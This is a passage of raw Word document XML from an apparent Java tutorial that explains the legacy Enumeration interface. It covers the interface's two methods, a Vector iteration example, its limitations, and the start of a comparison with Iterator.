          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:pict w14:anchorId="1A0E0733">
          <v:rect id="_x0000_i1590" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="2BEEDB1E" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="00442310">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
      </w:pPr>
      <w:bookmarkStart w:id="197" w:name="_Toc196307677"/>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="0070C0"/>
        </w:rPr>
        <w:t>What is Enumeration in java?</w:t>
      </w:r>
      <w:bookmarkEnd w:id="197"/>
    </w:p>
    <w:p w14:paraId="3C8E888D" w14:textId="6320D912" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="006F45E7">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w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is an interface that was introduced in </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java 1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> and is part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>java.util</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> package. It is used to iterate over a collection of elements, but it has been largely replaced by more modern alternatives such as </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Iterator</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for-each loop</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="43196097" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0044231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736F044">
          <v:rect id="_x0000_i1591" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="3F9B52C1" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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Characteristics of Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3A174B90" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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terator for Legacy Classes</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Enumeration was primarily designed to iterate over </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>legacy collections</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> like </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Vector</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Stack</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Hashtable</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="746A5438" w14:textId="50893085" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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s</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Enumeration has only two main methods:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20D0138F" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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MoreElements()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Checks if there are more elements in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="304DCB0E" w14:textId="27E1E9B9" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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extElement()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>: Retrieves the next element in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3373AF74" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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Basic Syntax and Usage of Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="130E4AE5" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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p>
    <w:p w14:paraId="265BE5D8" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E8D6138" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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numerationExamp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0D75B58" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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0D7E2B5" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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ing a Vector (legacy collection)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="55212C3F" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Vector</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vecto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Vector</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>&lt;&gt;();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AB40CE" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        vector</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pple"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="68E20975" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        vector</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Banana"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4291B9A0" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">        vector</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Cherry"</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>);</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B8B0D15" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5081D64A" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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ing an Enumeration object from the Vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2006B1DF" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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numeration</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enumeratio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vect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lements</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>();</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3BE27B73" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="000000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7AA6B088" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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Using Enumeration to iterate through the Vector</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67CF55BA" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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whi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numera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hasMoreElemen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818B862" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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numera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extElement</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>());</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="07664C17" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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A81C294" w14:textId="77777777" w:rsidR="00006285" w:rsidRPr="00CE4B9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77B2104" w14:textId="13106A77" w:rsidR="00006285" w:rsidRPr="00CE4B9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Theme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="666600"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>}</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02D2AF6E" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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Methods in Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="67A0CA3A" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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oolean hasMoreElements()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48CF29FA" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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s true if there are more elements in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="70C50271" w14:textId="3E045F77" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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s false when all elements have been iterated through.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="50FB952C" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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 nextElement()</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="01355EAC" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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Returns the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>next element</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> in the collection.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="522C7315" w14:textId="43B7E768" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="15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rows </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>NoSuchElementException</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> if no more elements are available (when hasMoreElements() returns false).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0E47C56C" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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Limitations of Enumeration:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6F9D060E" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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remove() Method</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: Unlike </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Iterator</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Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> doesn't have a remove() method. This means you can't remove elements during iteration.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6D642E9F" w14:textId="2FB28B76" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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utdated</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">: It was replaced by </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> (introduced in Java 1.2) as part of the </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Java Collections Framework</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve">. The </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Iterator</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> interface has additional functionality like element removal, which </w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:bCs/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Enumeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> lacks.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="375D792E" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00000000" w:rsidP="0044231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1AC3826">
          <v:rect id="_x0000_i1592" style="width:0;height:1.5pt" o:hralign="center" o:hrstd="t" o:hr="t" fillcolor="#a0a0a0" stroked="f"/>
        </w:pict>
      </w:r>
    </w:p>
    <w:p w14:paraId="17FEB773" w14:textId="77777777" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310" w:rsidP="0044231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parison with Iterator:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="438FA187" w14:textId="77777777" w:rsidR="0029511D" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1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numeration</w:t>
      </w:r>
      <w:r w:rsidRPr="00CE4B95">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="majorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t xml:space="preserve"> is older and is mainly used for legacy classes (like Vector, Hashtable).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="54DF21E5" w14:textId="7F7EEE79" w:rsidR="00442310" w:rsidRPr="00CE4B95" w:rsidRDefault="00442310">
